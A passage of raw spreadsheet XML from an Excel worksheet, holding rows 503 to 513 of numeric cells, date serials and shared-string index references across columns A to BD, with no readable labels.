        <v>8242</v>
      </c>
      <c r="J503">
        <v>0</v>
      </c>
      <c r="K503">
        <v>0</v>
      </c>
      <c r="L503">
        <v>0</v>
      </c>
      <c r="M503">
        <v>0</v>
      </c>
      <c r="N503">
        <v>0</v>
      </c>
      <c r="O503">
        <v>0</v>
      </c>
      <c r="P503">
        <v>0</v>
      </c>
      <c r="Q503">
        <v>0</v>
      </c>
      <c r="R503">
        <v>0</v>
      </c>
      <c r="S503">
        <v>0</v>
      </c>
      <c r="T503">
        <v>1</v>
      </c>
      <c r="U503">
        <v>0</v>
      </c>
      <c r="V503">
        <v>0</v>
      </c>
      <c r="W503">
        <v>0</v>
      </c>
      <c r="X503">
        <v>0</v>
      </c>
      <c r="Y503">
        <v>0</v>
      </c>
      <c r="Z503">
        <v>0</v>
      </c>
      <c r="AA503">
        <v>0</v>
      </c>
      <c r="AB503">
        <v>0</v>
      </c>
      <c r="AC503">
        <v>0</v>
      </c>
      <c r="AD503">
        <v>0</v>
      </c>
      <c r="AE503">
        <v>500000</v>
      </c>
      <c r="AF503" t="s">
        <v>4070</v>
      </c>
      <c r="AG503">
        <v>61261</v>
      </c>
      <c r="AH503">
        <v>16</v>
      </c>
      <c r="AJ503">
        <v>242</v>
      </c>
      <c r="AK503" t="s">
        <v>4071</v>
      </c>
      <c r="AL503" t="s">
        <v>4072</v>
      </c>
      <c r="AM503" t="s">
        <v>4073</v>
      </c>
      <c r="AN503" t="s">
        <v>55</v>
      </c>
      <c r="AO503">
        <v>1991</v>
      </c>
      <c r="AP503" t="s">
        <v>4074</v>
      </c>
      <c r="AQ503" t="s">
        <v>4075</v>
      </c>
      <c r="AR503" t="s">
        <v>4076</v>
      </c>
      <c r="AS503" t="s">
        <v>371</v>
      </c>
      <c r="AT503" t="s">
        <v>58</v>
      </c>
      <c r="AU503">
        <v>30</v>
      </c>
      <c r="AV503">
        <v>3</v>
      </c>
      <c r="AW503">
        <v>105</v>
      </c>
      <c r="AX503">
        <v>2</v>
      </c>
      <c r="AY503">
        <v>10</v>
      </c>
      <c r="AZ503">
        <v>5</v>
      </c>
      <c r="BA503" t="s">
        <v>16883</v>
      </c>
      <c r="BB503" t="s">
        <v>15264</v>
      </c>
      <c r="BC503">
        <v>0</v>
      </c>
      <c r="BD503" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="504" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A504">
        <v>1641</v>
      </c>
      <c r="B504" t="s">
        <v>4077</v>
      </c>
      <c r="C504" t="s">
        <v>129</v>
      </c>
      <c r="D504" t="s">
        <v>4078</v>
      </c>
      <c r="E504" t="s">
        <v>142</v>
      </c>
      <c r="F504" t="s">
        <v>4079</v>
      </c>
      <c r="G504" s="1">
        <v>44258</v>
      </c>
      <c r="H504">
        <v>8246</v>
      </c>
      <c r="I504">
        <v>8246</v>
      </c>
      <c r="J504">
        <v>2</v>
      </c>
      <c r="K504">
        <v>0</v>
      </c>
      <c r="L504">
        <v>0</v>
      </c>
      <c r="M504">
        <v>1</v>
      </c>
      <c r="N504">
        <v>0</v>
      </c>
      <c r="O504">
        <v>0</v>
      </c>
      <c r="P504">
        <v>0</v>
      </c>
      <c r="Q504">
        <v>3</v>
      </c>
      <c r="R504">
        <v>0</v>
      </c>
      <c r="S504">
        <v>0</v>
      </c>
      <c r="T504">
        <v>1</v>
      </c>
      <c r="U504">
        <v>50000</v>
      </c>
      <c r="V504">
        <v>0</v>
      </c>
      <c r="W504">
        <v>0</v>
      </c>
      <c r="X504">
        <v>430</v>
      </c>
      <c r="Y504">
        <v>0</v>
      </c>
      <c r="Z504">
        <v>0</v>
      </c>
      <c r="AA504">
        <v>0</v>
      </c>
      <c r="AB504">
        <v>50</v>
      </c>
      <c r="AC504">
        <v>0</v>
      </c>
      <c r="AD504">
        <v>0</v>
      </c>
      <c r="AE504">
        <v>500</v>
      </c>
      <c r="AF504" t="s">
        <v>4080</v>
      </c>
      <c r="AG504">
        <v>15710</v>
      </c>
      <c r="AH504">
        <v>11</v>
      </c>
      <c r="AJ504">
        <v>268</v>
      </c>
      <c r="AK504" t="s">
        <v>829</v>
      </c>
      <c r="AL504" t="s">
        <v>4081</v>
      </c>
      <c r="AM504" t="s">
        <v>4082</v>
      </c>
      <c r="AN504" t="s">
        <v>68</v>
      </c>
      <c r="AO504">
        <v>2014</v>
      </c>
      <c r="AP504" t="s">
        <v>4083</v>
      </c>
      <c r="AQ504" t="s">
        <v>4084</v>
      </c>
      <c r="AR504" t="s">
        <v>4080</v>
      </c>
      <c r="AS504" t="s">
        <v>71</v>
      </c>
      <c r="AT504" t="s">
        <v>72</v>
      </c>
      <c r="AU504">
        <v>20</v>
      </c>
      <c r="AV504">
        <v>1</v>
      </c>
      <c r="AW504">
        <v>5</v>
      </c>
      <c r="AX504">
        <v>5</v>
      </c>
      <c r="AY504">
        <v>6</v>
      </c>
      <c r="AZ504">
        <v>5</v>
      </c>
      <c r="BA504" t="s">
        <v>16961</v>
      </c>
      <c r="BB504" t="s">
        <v>15421</v>
      </c>
      <c r="BC504" t="s">
        <v>9550</v>
      </c>
      <c r="BD504" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="505" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A505">
        <v>1113</v>
      </c>
      <c r="B505" t="s">
        <v>4085</v>
      </c>
      <c r="C505" t="s">
        <v>74</v>
      </c>
      <c r="D505" t="s">
        <v>4086</v>
      </c>
      <c r="E505" t="s">
        <v>623</v>
      </c>
      <c r="F505" t="s">
        <v>1016</v>
      </c>
      <c r="G505" s="1">
        <v>44347</v>
      </c>
      <c r="H505">
        <v>8255</v>
      </c>
      <c r="I505">
        <v>8255</v>
      </c>
      <c r="J505">
        <v>0</v>
      </c>
      <c r="K505">
        <v>1</v>
      </c>
      <c r="L505">
        <v>0</v>
      </c>
      <c r="M505">
        <v>0</v>
      </c>
      <c r="N505">
        <v>0</v>
      </c>
      <c r="O505">
        <v>0</v>
      </c>
      <c r="P505">
        <v>0</v>
      </c>
      <c r="Q505">
        <v>2</v>
      </c>
      <c r="R505">
        <v>0</v>
      </c>
      <c r="S505">
        <v>0</v>
      </c>
      <c r="T505">
        <v>0</v>
      </c>
      <c r="U505">
        <v>0</v>
      </c>
      <c r="V505">
        <v>500</v>
      </c>
      <c r="W505">
        <v>0</v>
      </c>
      <c r="X505">
        <v>0</v>
      </c>
      <c r="Y505">
        <v>0</v>
      </c>
      <c r="Z505">
        <v>0</v>
      </c>
      <c r="AA505">
        <v>0</v>
      </c>
      <c r="AB505">
        <v>50</v>
      </c>
      <c r="AC505">
        <v>0</v>
      </c>
      <c r="AD505">
        <v>0</v>
      </c>
      <c r="AE505">
        <v>0</v>
      </c>
      <c r="AF505" t="s">
        <v>2035</v>
      </c>
      <c r="AG505">
        <v>59552</v>
      </c>
      <c r="AH505">
        <v>14</v>
      </c>
      <c r="AJ505">
        <v>208</v>
      </c>
      <c r="AK505" t="s">
        <v>4087</v>
      </c>
      <c r="AL505" t="s">
        <v>1997</v>
      </c>
      <c r="AM505" t="s">
        <v>4088</v>
      </c>
      <c r="AN505" t="s">
        <v>68</v>
      </c>
      <c r="AO505">
        <v>2008</v>
      </c>
      <c r="AP505">
        <v>85290410444</v>
      </c>
      <c r="AQ505" t="s">
        <v>1021</v>
      </c>
      <c r="AR505" t="s">
        <v>4089</v>
      </c>
      <c r="AS505" t="s">
        <v>71</v>
      </c>
      <c r="AT505" t="s">
        <v>72</v>
      </c>
      <c r="AU505">
        <v>0</v>
      </c>
      <c r="AV505">
        <v>0</v>
      </c>
      <c r="AW505">
        <v>3</v>
      </c>
      <c r="AX505">
        <v>30</v>
      </c>
      <c r="AY505">
        <v>3</v>
      </c>
      <c r="AZ505">
        <v>1</v>
      </c>
      <c r="BA505" t="s">
        <v>17636</v>
      </c>
      <c r="BB505" t="s">
        <v>15059</v>
      </c>
      <c r="BC505">
        <v>0</v>
      </c>
      <c r="BD505">
        <v>0</v>
      </c>
    </row>
    <row r="506" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A506">
        <v>1527</v>
      </c>
      <c r="B506" t="s">
        <v>4090</v>
      </c>
      <c r="C506" t="s">
        <v>157</v>
      </c>
      <c r="D506" t="s">
        <v>4091</v>
      </c>
      <c r="E506" t="s">
        <v>374</v>
      </c>
      <c r="F506" t="s">
        <v>4092</v>
      </c>
      <c r="G506" s="1">
        <v>44284</v>
      </c>
      <c r="H506">
        <v>8266</v>
      </c>
      <c r="I506">
        <v>8266</v>
      </c>
      <c r="J506">
        <v>4</v>
      </c>
      <c r="K506">
        <v>1</v>
      </c>
      <c r="L506">
        <v>0</v>
      </c>
      <c r="M506">
        <v>13</v>
      </c>
      <c r="N506">
        <v>0</v>
      </c>
      <c r="O506">
        <v>0</v>
      </c>
      <c r="P506">
        <v>0</v>
      </c>
      <c r="Q506">
        <v>0</v>
      </c>
      <c r="R506">
        <v>0</v>
      </c>
      <c r="S506">
        <v>0</v>
      </c>
      <c r="T506">
        <v>1</v>
      </c>
      <c r="U506">
        <v>1250000</v>
      </c>
      <c r="V506">
        <v>50000</v>
      </c>
      <c r="W506">
        <v>0</v>
      </c>
      <c r="X506">
        <v>13000</v>
      </c>
      <c r="Y506">
        <v>0</v>
      </c>
      <c r="Z506">
        <v>0</v>
      </c>
      <c r="AA506">
        <v>0</v>
      </c>
      <c r="AB506">
        <v>0</v>
      </c>
      <c r="AC506">
        <v>0</v>
      </c>
      <c r="AD506">
        <v>0</v>
      </c>
      <c r="AE506">
        <v>100000</v>
      </c>
      <c r="AF506" t="s">
        <v>4093</v>
      </c>
      <c r="AG506">
        <v>62263</v>
      </c>
      <c r="AH506">
        <v>16</v>
      </c>
      <c r="AJ506">
        <v>251</v>
      </c>
      <c r="AK506" t="s">
        <v>802</v>
      </c>
      <c r="AL506" t="s">
        <v>803</v>
      </c>
      <c r="AM506" t="s">
        <v>4094</v>
      </c>
      <c r="AN506" t="s">
        <v>82</v>
      </c>
      <c r="AO506">
        <v>2011</v>
      </c>
      <c r="AP506" t="s">
        <v>4095</v>
      </c>
      <c r="AQ506" t="s">
        <v>4096</v>
      </c>
      <c r="AR506" t="s">
        <v>4097</v>
      </c>
      <c r="AS506" t="s">
        <v>71</v>
      </c>
      <c r="AT506" t="s">
        <v>86</v>
      </c>
      <c r="AU506">
        <v>25</v>
      </c>
      <c r="AV506">
        <v>3</v>
      </c>
      <c r="AW506">
        <v>305</v>
      </c>
      <c r="AX506">
        <v>35</v>
      </c>
      <c r="AY506">
        <v>13</v>
      </c>
      <c r="AZ506">
        <v>29</v>
      </c>
      <c r="BA506" t="s">
        <v>16926</v>
      </c>
      <c r="BB506" t="s">
        <v>15341</v>
      </c>
      <c r="BC506" t="s">
        <v>12834</v>
      </c>
      <c r="BD506" t="s">
        <v>12835</v>
      </c>
    </row>
    <row r="507" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A507">
        <v>1515</v>
      </c>
      <c r="B507" t="s">
        <v>4098</v>
      </c>
      <c r="C507" t="s">
        <v>99</v>
      </c>
      <c r="D507" t="s">
        <v>4099</v>
      </c>
      <c r="E507" t="s">
        <v>111</v>
      </c>
      <c r="F507" t="s">
        <v>4100</v>
      </c>
      <c r="G507" s="1">
        <v>44258</v>
      </c>
      <c r="H507">
        <v>8287</v>
      </c>
      <c r="I507">
        <v>8287</v>
      </c>
      <c r="J507">
        <v>1</v>
      </c>
      <c r="K507">
        <v>1</v>
      </c>
      <c r="L507">
        <v>0</v>
      </c>
      <c r="M507">
        <v>0</v>
      </c>
      <c r="N507">
        <v>0</v>
      </c>
      <c r="O507">
        <v>0</v>
      </c>
      <c r="P507">
        <v>0</v>
      </c>
      <c r="Q507">
        <v>0</v>
      </c>
      <c r="R507">
        <v>0</v>
      </c>
      <c r="S507">
        <v>0</v>
      </c>
      <c r="T507">
        <v>0</v>
      </c>
      <c r="U507">
        <v>561000</v>
      </c>
      <c r="V507">
        <v>1</v>
      </c>
      <c r="W507">
        <v>0</v>
      </c>
      <c r="X507">
        <v>0</v>
      </c>
      <c r="Y507">
        <v>0</v>
      </c>
      <c r="Z507">
        <v>0</v>
      </c>
      <c r="AA507">
        <v>0</v>
      </c>
      <c r="AB507">
        <v>0</v>
      </c>
      <c r="AC507">
        <v>0</v>
      </c>
      <c r="AD507">
        <v>1</v>
      </c>
      <c r="AE507">
        <v>0</v>
      </c>
      <c r="AF507" t="s">
        <v>4101</v>
      </c>
      <c r="AG507">
        <v>14440</v>
      </c>
      <c r="AH507">
        <v>12</v>
      </c>
      <c r="AJ507">
        <v>160</v>
      </c>
      <c r="AK507" t="s">
        <v>114</v>
      </c>
      <c r="AL507" t="s">
        <v>114</v>
      </c>
      <c r="AM507" t="s">
        <v>4102</v>
      </c>
      <c r="AN507" t="s">
        <v>55</v>
      </c>
      <c r="AO507">
        <v>2015</v>
      </c>
      <c r="AP507" t="s">
        <v>4103</v>
      </c>
      <c r="AQ507" t="s">
        <v>4104</v>
      </c>
      <c r="AR507" t="s">
        <v>4105</v>
      </c>
      <c r="AS507" t="s">
        <v>71</v>
      </c>
      <c r="AT507" t="s">
        <v>58</v>
      </c>
      <c r="AU507">
        <v>22</v>
      </c>
      <c r="AV507">
        <v>1</v>
      </c>
      <c r="AW507">
        <v>0</v>
      </c>
      <c r="AX507">
        <v>1</v>
      </c>
      <c r="AY507">
        <v>8</v>
      </c>
      <c r="AZ507">
        <v>3</v>
      </c>
      <c r="BA507" t="s">
        <v>16596</v>
      </c>
      <c r="BB507" t="s">
        <v>15333</v>
      </c>
      <c r="BC507" t="s">
        <v>12925</v>
      </c>
      <c r="BD507">
        <v>0</v>
      </c>
    </row>
    <row r="508" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A508">
        <v>1116</v>
      </c>
      <c r="B508" t="s">
        <v>4106</v>
      </c>
      <c r="C508" t="s">
        <v>318</v>
      </c>
      <c r="D508" t="s">
        <v>4107</v>
      </c>
      <c r="E508" t="s">
        <v>412</v>
      </c>
      <c r="F508" t="s">
        <v>4108</v>
      </c>
      <c r="G508" s="1">
        <v>44267</v>
      </c>
      <c r="H508">
        <v>8318</v>
      </c>
      <c r="I508">
        <v>8318</v>
      </c>
      <c r="J508">
        <v>3</v>
      </c>
      <c r="K508">
        <v>0</v>
      </c>
      <c r="L508">
        <v>1</v>
      </c>
      <c r="M508">
        <v>0</v>
      </c>
      <c r="N508">
        <v>0</v>
      </c>
      <c r="O508">
        <v>0</v>
      </c>
      <c r="P508">
        <v>0</v>
      </c>
      <c r="Q508">
        <v>3</v>
      </c>
      <c r="R508">
        <v>0</v>
      </c>
      <c r="S508">
        <v>0</v>
      </c>
      <c r="T508">
        <v>0</v>
      </c>
      <c r="U508">
        <v>45000</v>
      </c>
      <c r="V508">
        <v>0</v>
      </c>
      <c r="W508">
        <v>1000</v>
      </c>
      <c r="X508">
        <v>0</v>
      </c>
      <c r="Y508">
        <v>0</v>
      </c>
      <c r="Z508">
        <v>0</v>
      </c>
      <c r="AA508">
        <v>0</v>
      </c>
      <c r="AB508">
        <v>780</v>
      </c>
      <c r="AC508">
        <v>0</v>
      </c>
      <c r="AD508">
        <v>0</v>
      </c>
      <c r="AE508">
        <v>0</v>
      </c>
      <c r="AF508" t="s">
        <v>4109</v>
      </c>
      <c r="AG508">
        <v>92171</v>
      </c>
      <c r="AH508">
        <v>26</v>
      </c>
      <c r="AJ508">
        <v>404</v>
      </c>
      <c r="AK508" t="s">
        <v>4110</v>
      </c>
      <c r="AL508" t="s">
        <v>4111</v>
      </c>
      <c r="AM508" t="s">
        <v>4112</v>
      </c>
      <c r="AN508" t="s">
        <v>55</v>
      </c>
      <c r="AO508">
        <v>2012</v>
      </c>
      <c r="AP508">
        <v>81288136187</v>
      </c>
      <c r="AQ508" t="s">
        <v>4113</v>
      </c>
      <c r="AR508" t="s">
        <v>4113</v>
      </c>
      <c r="AS508" t="s">
        <v>71</v>
      </c>
      <c r="AT508" t="s">
        <v>58</v>
      </c>
      <c r="AU508">
        <v>26</v>
      </c>
      <c r="AV508">
        <v>1</v>
      </c>
      <c r="AW508">
        <v>0</v>
      </c>
      <c r="AX508">
        <v>10</v>
      </c>
      <c r="AY508">
        <v>7</v>
      </c>
      <c r="AZ508">
        <v>9</v>
      </c>
      <c r="BA508" t="s">
        <v>17640</v>
      </c>
      <c r="BB508" t="s">
        <v>15060</v>
      </c>
      <c r="BC508" t="s">
        <v>9550</v>
      </c>
      <c r="BD508" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="509" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A509">
        <v>1512</v>
      </c>
      <c r="B509" t="s">
        <v>4114</v>
      </c>
      <c r="C509" t="s">
        <v>157</v>
      </c>
      <c r="D509" t="s">
        <v>4115</v>
      </c>
      <c r="E509" t="s">
        <v>4116</v>
      </c>
      <c r="F509" t="s">
        <v>4117</v>
      </c>
      <c r="G509" s="1">
        <v>44327</v>
      </c>
      <c r="H509">
        <v>8339</v>
      </c>
      <c r="I509">
        <v>8339</v>
      </c>
      <c r="J509">
        <v>0</v>
      </c>
      <c r="K509">
        <v>0</v>
      </c>
      <c r="L509">
        <v>0</v>
      </c>
      <c r="M509">
        <v>0</v>
      </c>
      <c r="N509">
        <v>0</v>
      </c>
      <c r="O509">
        <v>0</v>
      </c>
      <c r="P509">
        <v>0</v>
      </c>
      <c r="Q509">
        <v>6</v>
      </c>
      <c r="R509">
        <v>5</v>
      </c>
      <c r="S509">
        <v>0</v>
      </c>
      <c r="T509">
        <v>1</v>
      </c>
      <c r="U509">
        <v>0</v>
      </c>
      <c r="V509">
        <v>0</v>
      </c>
      <c r="W509">
        <v>0</v>
      </c>
      <c r="X509">
        <v>0</v>
      </c>
      <c r="Y509">
        <v>0</v>
      </c>
      <c r="Z509">
        <v>0</v>
      </c>
      <c r="AA509">
        <v>0</v>
      </c>
      <c r="AB509">
        <v>6000</v>
      </c>
      <c r="AC509">
        <v>5000</v>
      </c>
      <c r="AD509">
        <v>0</v>
      </c>
      <c r="AE509">
        <v>100000</v>
      </c>
      <c r="AF509" t="s">
        <v>4118</v>
      </c>
      <c r="AG509">
        <v>68352</v>
      </c>
      <c r="AH509">
        <v>16</v>
      </c>
      <c r="AJ509">
        <v>239</v>
      </c>
      <c r="AK509" t="s">
        <v>4119</v>
      </c>
      <c r="AL509" t="s">
        <v>4120</v>
      </c>
      <c r="AM509" t="s">
        <v>4121</v>
      </c>
      <c r="AN509" t="s">
        <v>55</v>
      </c>
      <c r="AO509">
        <v>2014</v>
      </c>
      <c r="AP509">
        <v>81357842020</v>
      </c>
      <c r="AQ509">
        <v>81357842020</v>
      </c>
      <c r="AR509" t="s">
        <v>4122</v>
      </c>
      <c r="AS509" t="s">
        <v>371</v>
      </c>
      <c r="AT509" t="s">
        <v>58</v>
      </c>
      <c r="AU509">
        <v>26</v>
      </c>
      <c r="AV509">
        <v>1</v>
      </c>
      <c r="AW509">
        <v>9</v>
      </c>
      <c r="AX509">
        <v>11</v>
      </c>
      <c r="AY509">
        <v>6</v>
      </c>
      <c r="AZ509">
        <v>0</v>
      </c>
      <c r="BA509" t="s">
        <v>16920</v>
      </c>
      <c r="BB509" t="s">
        <v>15330</v>
      </c>
      <c r="BC509">
        <v>0</v>
      </c>
      <c r="BD509" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="510" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A510">
        <v>1386</v>
      </c>
      <c r="B510" t="s">
        <v>4123</v>
      </c>
      <c r="C510" t="s">
        <v>168</v>
      </c>
      <c r="D510" t="s">
        <v>4124</v>
      </c>
      <c r="E510" t="s">
        <v>142</v>
      </c>
      <c r="F510" t="s">
        <v>4125</v>
      </c>
      <c r="G510" s="1">
        <v>44291</v>
      </c>
      <c r="H510">
        <v>8358</v>
      </c>
      <c r="I510">
        <v>8358</v>
      </c>
      <c r="J510">
        <v>3</v>
      </c>
      <c r="K510">
        <v>0</v>
      </c>
      <c r="L510">
        <v>3</v>
      </c>
      <c r="M510">
        <v>0</v>
      </c>
      <c r="N510">
        <v>0</v>
      </c>
      <c r="O510">
        <v>0</v>
      </c>
      <c r="P510">
        <v>0</v>
      </c>
      <c r="Q510">
        <v>0</v>
      </c>
      <c r="R510">
        <v>0</v>
      </c>
      <c r="S510">
        <v>0</v>
      </c>
      <c r="T510">
        <v>0</v>
      </c>
      <c r="U510">
        <v>20000</v>
      </c>
      <c r="V510">
        <v>0</v>
      </c>
      <c r="W510">
        <v>2000</v>
      </c>
      <c r="X510">
        <v>0</v>
      </c>
      <c r="Y510">
        <v>0</v>
      </c>
      <c r="Z510">
        <v>0</v>
      </c>
      <c r="AA510">
        <v>0</v>
      </c>
      <c r="AB510">
        <v>0</v>
      </c>
      <c r="AC510">
        <v>0</v>
      </c>
      <c r="AD510">
        <v>0</v>
      </c>
      <c r="AE510">
        <v>0</v>
      </c>
      <c r="AF510" t="s">
        <v>4126</v>
      </c>
      <c r="AG510">
        <v>41181</v>
      </c>
      <c r="AH510">
        <v>13</v>
      </c>
      <c r="AJ510">
        <v>174</v>
      </c>
      <c r="AK510" t="s">
        <v>4127</v>
      </c>
      <c r="AL510" t="s">
        <v>4128</v>
      </c>
      <c r="AM510" t="s">
        <v>4129</v>
      </c>
      <c r="AN510" t="s">
        <v>55</v>
      </c>
      <c r="AO510">
        <v>2011</v>
      </c>
      <c r="AP510" t="s">
        <v>4130</v>
      </c>
      <c r="AQ510">
        <v>85313097213</v>
      </c>
      <c r="AR510" t="s">
        <v>4131</v>
      </c>
      <c r="AS510" t="s">
        <v>71</v>
      </c>
      <c r="AT510" t="s">
        <v>58</v>
      </c>
      <c r="AU510">
        <v>26</v>
      </c>
      <c r="AV510">
        <v>1</v>
      </c>
      <c r="AW510">
        <v>30</v>
      </c>
      <c r="AX510">
        <v>40</v>
      </c>
      <c r="AY510">
        <v>6</v>
      </c>
      <c r="AZ510">
        <v>8</v>
      </c>
      <c r="BA510">
        <v>0</v>
      </c>
      <c r="BB510" t="s">
        <v>15243</v>
      </c>
      <c r="BC510" t="s">
        <v>13203</v>
      </c>
      <c r="BD510">
        <v>0</v>
      </c>
    </row>
    <row r="511" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A511">
        <v>1341</v>
      </c>
      <c r="B511" t="s">
        <v>4132</v>
      </c>
      <c r="C511" t="s">
        <v>189</v>
      </c>
      <c r="D511" t="s">
        <v>4133</v>
      </c>
      <c r="E511" t="s">
        <v>142</v>
      </c>
      <c r="F511" t="s">
        <v>4134</v>
      </c>
      <c r="G511" s="1">
        <v>44267</v>
      </c>
      <c r="H511">
        <v>8359</v>
      </c>
      <c r="I511">
        <v>8359</v>
      </c>
      <c r="J511">
        <v>3</v>
      </c>
      <c r="K511">
        <v>1</v>
      </c>
      <c r="L511">
        <v>2</v>
      </c>
      <c r="M511">
        <v>1</v>
      </c>
      <c r="N511">
        <v>0</v>
      </c>
      <c r="O511">
        <v>0</v>
      </c>
      <c r="P511">
        <v>0</v>
      </c>
      <c r="Q511">
        <v>0</v>
      </c>
      <c r="R511">
        <v>8</v>
      </c>
      <c r="S511">
        <v>0</v>
      </c>
      <c r="T511">
        <v>1</v>
      </c>
      <c r="U511">
        <v>75000</v>
      </c>
      <c r="V511">
        <v>10000</v>
      </c>
      <c r="W511">
        <v>10000</v>
      </c>
      <c r="X511">
        <v>17000</v>
      </c>
      <c r="Y511">
        <v>0</v>
      </c>
      <c r="Z511">
        <v>0</v>
      </c>
      <c r="AA511">
        <v>0</v>
      </c>
      <c r="AB511">
        <v>0</v>
      </c>
      <c r="AC511">
        <v>10000</v>
      </c>
      <c r="AD511">
        <v>0</v>
      </c>
      <c r="AE511">
        <v>10000</v>
      </c>
      <c r="AF511" t="s">
        <v>4135</v>
      </c>
      <c r="AG511">
        <v>97232</v>
      </c>
      <c r="AH511">
        <v>31</v>
      </c>
      <c r="AJ511">
        <v>461</v>
      </c>
      <c r="AK511" t="s">
        <v>4136</v>
      </c>
      <c r="AL511" t="s">
        <v>4137</v>
      </c>
      <c r="AM511" t="s">
        <v>4138</v>
      </c>
      <c r="AN511" t="s">
        <v>68</v>
      </c>
      <c r="AO511">
        <v>2018</v>
      </c>
      <c r="AP511" t="s">
        <v>4139</v>
      </c>
      <c r="AQ511" t="s">
        <v>4140</v>
      </c>
      <c r="AR511" t="s">
        <v>4141</v>
      </c>
      <c r="AS511" t="s">
        <v>187</v>
      </c>
      <c r="AT511" t="s">
        <v>72</v>
      </c>
      <c r="AU511">
        <v>0</v>
      </c>
      <c r="AV511">
        <v>0</v>
      </c>
      <c r="AW511">
        <v>8</v>
      </c>
      <c r="AX511">
        <v>0</v>
      </c>
      <c r="AY511">
        <v>3</v>
      </c>
      <c r="AZ511">
        <v>3</v>
      </c>
      <c r="BA511" t="s">
        <v>16849</v>
      </c>
      <c r="BB511" t="s">
        <v>15211</v>
      </c>
      <c r="BC511" t="s">
        <v>10010</v>
      </c>
      <c r="BD511" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="512" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A512">
        <v>1502</v>
      </c>
      <c r="B512" t="s">
        <v>4142</v>
      </c>
      <c r="C512" t="s">
        <v>2760</v>
      </c>
      <c r="D512" t="s">
        <v>4143</v>
      </c>
      <c r="E512" t="s">
        <v>111</v>
      </c>
      <c r="F512" t="s">
        <v>4144</v>
      </c>
      <c r="G512" s="1">
        <v>44265</v>
      </c>
      <c r="H512">
        <v>8373</v>
      </c>
      <c r="I512">
        <v>8373</v>
      </c>
      <c r="J512">
        <v>2</v>
      </c>
      <c r="K512">
        <v>1</v>
      </c>
      <c r="L512">
        <v>2</v>
      </c>
      <c r="M512">
        <v>0</v>
      </c>
      <c r="N512">
        <v>0</v>
      </c>
      <c r="O512">
        <v>0</v>
      </c>
      <c r="P512">
        <v>0</v>
      </c>
      <c r="Q512">
        <v>0</v>
      </c>
      <c r="R512">
        <v>0</v>
      </c>
      <c r="S512">
        <v>0</v>
      </c>
      <c r="T512">
        <v>0</v>
      </c>
      <c r="U512">
        <v>5</v>
      </c>
      <c r="V512">
        <v>1</v>
      </c>
      <c r="W512">
        <v>5</v>
      </c>
      <c r="X512">
        <v>0</v>
      </c>
      <c r="Y512">
        <v>0</v>
      </c>
      <c r="Z512">
        <v>0</v>
      </c>
      <c r="AA512">
        <v>0</v>
      </c>
      <c r="AB512">
        <v>0</v>
      </c>
      <c r="AC512">
        <v>0</v>
      </c>
      <c r="AD512">
        <v>0</v>
      </c>
      <c r="AE512">
        <v>0</v>
      </c>
      <c r="AF512" t="s">
        <v>4145</v>
      </c>
      <c r="AG512">
        <v>83655</v>
      </c>
      <c r="AH512">
        <v>18</v>
      </c>
      <c r="AJ512">
        <v>285</v>
      </c>
      <c r="AK512" t="s">
        <v>4146</v>
      </c>
      <c r="AL512" t="s">
        <v>4147</v>
      </c>
      <c r="AM512" t="s">
        <v>4148</v>
      </c>
      <c r="AN512" t="s">
        <v>68</v>
      </c>
      <c r="AO512">
        <v>2018</v>
      </c>
      <c r="AP512">
        <v>81805780764</v>
      </c>
      <c r="AQ512" t="s">
        <v>4149</v>
      </c>
      <c r="AR512" t="s">
        <v>4145</v>
      </c>
      <c r="AS512" t="s">
        <v>71</v>
      </c>
      <c r="AT512" t="s">
        <v>72</v>
      </c>
      <c r="AU512">
        <v>7</v>
      </c>
      <c r="AV512">
        <v>0</v>
      </c>
      <c r="AW512">
        <v>0</v>
      </c>
      <c r="AX512">
        <v>0</v>
      </c>
      <c r="AY512">
        <v>18</v>
      </c>
      <c r="AZ512">
        <v>3</v>
      </c>
      <c r="BA512">
        <v>0</v>
      </c>
      <c r="BB512" t="s">
        <v>15324</v>
      </c>
      <c r="BC512" t="s">
        <v>12934</v>
      </c>
      <c r="BD512">
        <v>0</v>
      </c>
    </row>
    <row r="513" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A513">
        <v>1437</v>
      </c>
      <c r="B513" t="s">
        <v>4150</v>
      </c>
      <c r="C513" t="s">
        <v>607</v>
      </c>
      <c r="D513" t="s">
        <v>4151</v>
      </c>
      <c r="E513" t="s">
        <v>142</v>
      </c>
      <c r="F513" t="s">
        <v>609</v>
      </c>
      <c r="G513" s="1">
        <v>44284</v>
      </c>
      <c r="H513">
        <v>8394</v>
      </c>
      <c r="I513">
        <v>8394</v>
      </c>
      <c r="J513">
        <v>1</v>
      </c>
      <c r="K513">
        <v>0</v>
      </c>
      <c r="L513">
        <v>3</v>
      </c>
      <c r="M513">
        <v>0</v>
      </c>
      <c r="N513">
        <v>0</v>
      </c>
      <c r="O513">
        <v>0</v>
      </c>
      <c r="P513">
        <v>0</v>
      </c>
      <c r="Q513">
        <v>0</v>
      </c>
      <c r="R513">
        <v>2</v>
      </c>
      <c r="S513">
        <v>1</v>
      </c>
      <c r="T513">
        <v>0</v>
      </c>
      <c r="U513">
        <v>80000</v>
      </c>
      <c r="V513">
        <v>1</v>
      </c>
      <c r="W513">
        <v>12000</v>
      </c>
      <c r="X513">
        <v>0</v>
      </c>
      <c r="Y513">
        <v>0</v>
      </c>
      <c r="Z513">
        <v>0</v>
      </c>
      <c r="AA513">
        <v>0</v>
      </c>
      <c r="AB513">
        <v>0</v>
      </c>
      <c r="AC513">
        <v>2000</v>
      </c>
      <c r="AD513">
        <v>1</v>
      </c>
      <c r="AE513">
        <v>0</v>
      </c>
      <c r="AF513" t="s">
        <v>615</v>
      </c>
      <c r="AG513">
        <v>77146</v>
      </c>
      <c r="AH513">
        <v>24</v>
      </c>
      <c r="AJ513">
        <v>370</v>
      </c>
      <c r="AK513" t="s">
        <v>611</v>
      </c>
      <c r="AL513" t="s">
        <v>612</v>
      </c>
